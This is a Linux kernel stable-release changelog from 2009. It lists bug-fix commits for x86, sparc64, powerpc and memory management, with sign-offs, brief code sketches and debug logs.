commit dd4124a8a06bca89c077a16437edac010f0bb993 upstream. Dell XPS710 will hang on reboot. This is resolved by adding a quirk to set bios reboot. Signed-off-by: Leann Ogasawara <leann.ogasawara@canonical.com> Signed-off-by: Tim Gardner <tim.gardner@canonical.com> Cc: "manoj.iyer" <manoj.iyer@canonical.com> LKML-Reference: <1236196380.3231.89.camel@emiko> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
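Reboot quirks of this kind are DMI-matched entries in the x86 reboot quirk table; the new entry looks roughly like this (a sketch, exact strings and formatting may differ from the upstream hunk):

    {       /* Handle reboot problems on the Dell XPS710 */
            .callback = set_bios_reboot,
            .ident = "Dell XPS710",
            .matches = {
                    DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
                    DMI_MATCH(DMI_PRODUCT_NAME, "Dell XPS710"),
            },
    },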
2009-03-16  x86: oprofile: don't set counter width from cpuid on Core2  (Tim Blechmann)
commit 780eef9492b16a1543a3b2ae9f9526a735fc9856 upstream. Impact: fix stuck NMIs and non-working oprofile on certain CPUs Resetting the counter width of the performance counters on Intel's Core2 CPUs, breaks the delivery of NMIs, when running in x86_64 mode. This should fix bug #12395: http://bugzilla.kernel.org/show_bug.cgi?id=12395 Signed-off-by: Tim Blechmann <tim@klingt.org> Signed-off-by: Robert Richter <robert.richter@amd.com> LKML-Reference: <20090303100412.GC10085@erda.amd.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16  x86, vmi: TSC going backwards check in vmi clocksource  (Alok N Kataria)
commit 48ffc70b675aa7798a52a2e92e20f6cce9140b3d upstream. Impact: fix time warps under vmware Similar to the check for TSC going backwards in the TSC clocksource, we also need this check for VMI clocksource. Signed-off-by: Alok N Kataria <akataria@vmware.com> Cc: Zachary Amsden <zach@vmware.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16  mm: fix memmap init for handling memory hole  (KAMEZAWA Hiroyuki)
commit cc2559bccc72767cb446f79b071d96c30c26439b upstream. Now, early_pfn_in_nid(PFN, NID) may return false if the PFN is in a hole, and memmap initialization was then not done. This was a problem for sparc boot. To fix this, the PFN should be initialized and marked as PG_reserved. This patch changes early_pfn_in_nid() to return true if the PFN is in a hole. Signed-off-by: KAMEZAWA Hiroyuki <kamezawa.hiroyu@jp.fujitsu.com> Reported-by: David Miller <davem@davemloft.net> Tested-by: KOSAKI Motohiro <kosaki.motohiro@jp.fujitsu.com> Cc: Mel Gorman <mel@csn.ul.ie> Cc: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16  mm: clean up for early_pfn_to_nid()  (KAMEZAWA Hiroyuki)
commit f2dbcfa738368c8a40d4a5f0b65dc9879577cb21 upstream. What's happening is that the assertion in mm/page_alloc.c:move_freepages() is triggering:

    BUG_ON(page_zone(start_page) != page_zone(end_page));

Once I knew this is what was happening, I added some annotations:

    if (unlikely(page_zone(start_page) != page_zone(end_page))) {
            printk(KERN_ERR "move_freepages: Bogus zones: "
                   "start_page[%p] end_page[%p] zone[%p]\n",
                   start_page, end_page, zone);
            printk(KERN_ERR "move_freepages: "
                   "start_zone[%p] end_zone[%p]\n",
                   page_zone(start_page), page_zone(end_page));
            printk(KERN_ERR "move_freepages: "
                   "start_pfn[0x%lx] end_pfn[0x%lx]\n",
                   page_to_pfn(start_page), page_to_pfn(end_page));
            printk(KERN_ERR "move_freepages: "
                   "start_nid[%d] end_nid[%d]\n",
                   page_to_nid(start_page), page_to_nid(end_page));
    ...

And here's what I got:

    move_freepages: Bogus zones: start_page[2207d0000] end_page[2207dffc0] zone[fffff8103effcb00]
    move_freepages: start_zone[fffff8103effcb00] end_zone[fffff8003fffeb00]
    move_freepages: start_pfn[0x81f600] end_pfn[0x81f7ff]
    move_freepages: start_nid[1] end_nid[0]

My memory layout on this box is:

    [    0.000000] Zone PFN ranges:
    [    0.000000]   Normal   0x00000000 -> 0x0081ff5d
    [    0.000000] Movable zone start PFN for each node
    [    0.000000] early_node_map[8] active PFN ranges
    [    0.000000]     0: 0x00000000 -> 0x00020000
    [    0.000000]     1: 0x00800000 -> 0x0081f7ff
    [    0.000000]     1: 0x0081f800 -> 0x0081fe50
    [    0.000000]     1: 0x0081fed1 -> 0x0081fed8
    [    0.000000]     1: 0x0081feda -> 0x0081fedb
    [    0.000000]     1: 0x0081fedd -> 0x0081fee5
    [    0.000000]     1: 0x0081fee7 -> 0x0081ff51
    [    0.000000]     1: 0x0081ff59 -> 0x0081ff5d

So it's a block move in that 0x81f600-->0x81f7ff region which triggers the problem.

This patch: The declaration of early_pfn_to_nid() is scattered over per-arch include files, and it seems complicated to know when the declaration is used. I think that makes the fix for memmap init not easy. This patch moves all declarations to include/linux/mm.h. After this:

    if !CONFIG_NODES_POPULATES_NODE_MAP && !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID
       -> use the static definition in include/linux/mm.h
    else if !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID
       -> use the generic definition in mm/page_alloc.c
    else
       -> the per-arch back end function will be called.

Signed-off-by: KAMEZAWA Hiroyuki <kamezawa.hiroyu@jp.fujitsu.com> Tested-by: KOSAKI Motohiro <kosaki.motohiro@jp.fujitsu.com> Reported-by: David Miller <davem@davemloft.net> Cc: Mel Gorman <mel@csn.ul.ie> Cc: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16  sparc64: Fix DAX handling via userspace access from kernel.  (David S. Miller)
[ Upstream commit fcd26f7ae2ea5889134e8b3d60a42ce8b993c95f ] If we do a userspace access from kernel mode, and get a data access exception, we need to check the exception table just like a normal fault does. The spitfire DAX handler was doing this, but such logic was missing from the sun4v DAX code. Reported-by: Dennis Gilmore <dgilmore@redhat.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
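Conceptually, the sun4v handler gains the same escape hatch the spitfire handler already had: on a privileged fault, consult the exception table and branch to the fixup instead of dying. A sketch of that shape (not the verbatim upstream hunk):

    if (regs->tstate & TSTATE_PRIV) {
            const struct exception_table_entry *entry;

            /* kernel-mode fault: was this a __get_user/__put_user
             * style userspace access with a registered fixup? */
            entry = search_exception_tables(regs->tpc);
            if (entry) {
                    regs->tpc = entry->fixup;
                    regs->tnpc = regs->tpc + 4;
                    return;
            }
    }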
2009-03-16  sparc64: Fix crashes in jbusmc_print_dimm()  (David S. Miller)
[ Upstream commit 1b0e235cc9bfae4bc0f5cd0cba929206fb0f6a64 ] Return was missing for the case where there is no dimm info match. Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-02-20  x86, vm86: fix preemption bug  (Thomas Gleixner)
commit be716615fe596ee117292dc615e95f707fb67fd1 upstream. Commit 3d2a71a596bd9c761c8487a2178e95f8a61da083 ("x86, traps: converge do_debug handlers") changed the preemption disable logic of do_debug() so vm86_handle_trap() is called with preemption disabled resulting in:

    BUG: sleeping function called from invalid context at include/linux/kernel.h:155
    in_atomic(): 1, irqs_disabled(): 0, pid: 3005, name: dosemu.bin
    Pid: 3005, comm: dosemu.bin Tainted: G W 2.6.29-rc1 #51
    Call Trace:
     [<c050d669>] copy_to_user+0x33/0x108
     [<c04181f4>] save_v86_state+0x65/0x149
     [<c0418531>] handle_vm86_trap+0x20/0x8f
     [<c064e345>] do_debug+0x15b/0x1a4
     [<c064df1f>] debug_stack_correct+0x27/0x2c
     [<c040365b>] sysenter_do_call+0x12/0x2f
    BUG: scheduling while atomic: dosemu.bin/3005/0x10000001

Restore the original calling convention and reenable preemption before calling handle_vm86_trap(). Reported-by: Michal Suchanek <hramrach@centrum.cz> Signed-off-by: Thomas Gleixner <tglx@linutronix.de> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-02-20  x86/cpa: make sure cpa is safe to call in lazy mmu mode  (Jeremy Fitzhardinge)
commit 4f06b0436b2ddbd3b67b10e77098a6862787b3eb upstream. Impact: fix race leading to crash under KVM and Xen The CPA code may be called while we're in lazy mmu update mode - for example, when using DEBUG_PAGE_ALLOC and doing a slab allocation in an interrupt handler which interrupted a lazy mmu update. In this case, the in-memory pagetable state may be out of date due to pending queued updates. We need to flush any pending updates before inspecting the page table. Similarly, we must explicitly flush any modifications CPA may have made (which comes down to flushing queued operations when flushing the TLB). Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com> Acked-by: Marcelo Tosatti <mtosatti@redhat.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-02-20  powerpc/vsx: Fix VSX alignment handler for regs 32-63  (Michael Neuling)
commit 26456dcfb8d8e43b1b64b2a14710694cf7a72f05 upstream. Fix the VSX alignment handler for VSX registers > 32. 32-63 are stored in the VMX part of the thread_struct not the FPR part. Signed-off-by: Michael Neuling <mikey@neuling.org> Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-02-17  x86: microcode_amd: fix wrong handling of equivalent CPU id  (Andreas Herrmann)
commit 3c763fd77e66e55d029052da31df0abd9920cb1e upstream. Impact: fix bug resulting in non-loaded AMD microcode mc_header->processor_rev_id is a 2 byte value. Similar is true for equiv_cpu in an equiv_cpu_entry -- only 2 bytes are of interest. Signed-off-by: Andreas Herrmann <andreas.herrmann3@amd.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
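In other words, the match has to be done on 16-bit values; schematically (variable and field names follow the description above, simplified from the real lookup loop):

    /* only the low 16 bits of the equivalence-table entry are a CPU id,
     * so compare as u16 -- stray high bits must not defeat the match */
    u16 equiv_cpu_id = (u16)equiv_cpu_table[i].equiv_cpu;

    if (!equiv_cpu_id || mc_header->processor_rev_id != equiv_cpu_id)
            return 0;       /* this microcode patch is not for this CPU */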
2009-02-17  sparc64: Annotate sparc64 specific syscalls with SYSCALL_DEFINEx()  (David S. Miller)
[ Upstream commit e42650196df34789c825fa83f8bb37a5d5e52c14 ] Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
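For reference, the annotation pattern looks like this (a generic example with hypothetical names, not one of the sparc64 syscalls verbatim):

    /* before: a bare definition, no sign-extension of narrow arguments */
    asmlinkage long sys_example(int fd, unsigned long len);

    /* after: SYSCALL_DEFINEx emits a wrapper that sign-extends 32-bit
     * arguments the way the 64-bit calling convention expects
     * (sys_example/do_example are hypothetical, for illustration) */
    SYSCALL_DEFINE2(example, int, fd, unsigned long, len)
    {
            return do_example(fd, len);
    }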
2009-02-17  sparc: Enable syscall wrappers for 64-bit (CVE-2009-0029)  (Christian Borntraeger)
[ Upstream commit 67605d6812691bbd2158d2f60259e0407611bc1b ] sparc64 needs sign-extended function parameters. We have to enable the system call wrappers. Signed-off-by: Christian Borntraeger <borntraeger@de.ibm.com> Signed-off-by: David S. Miller <davem@davemloft.net> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>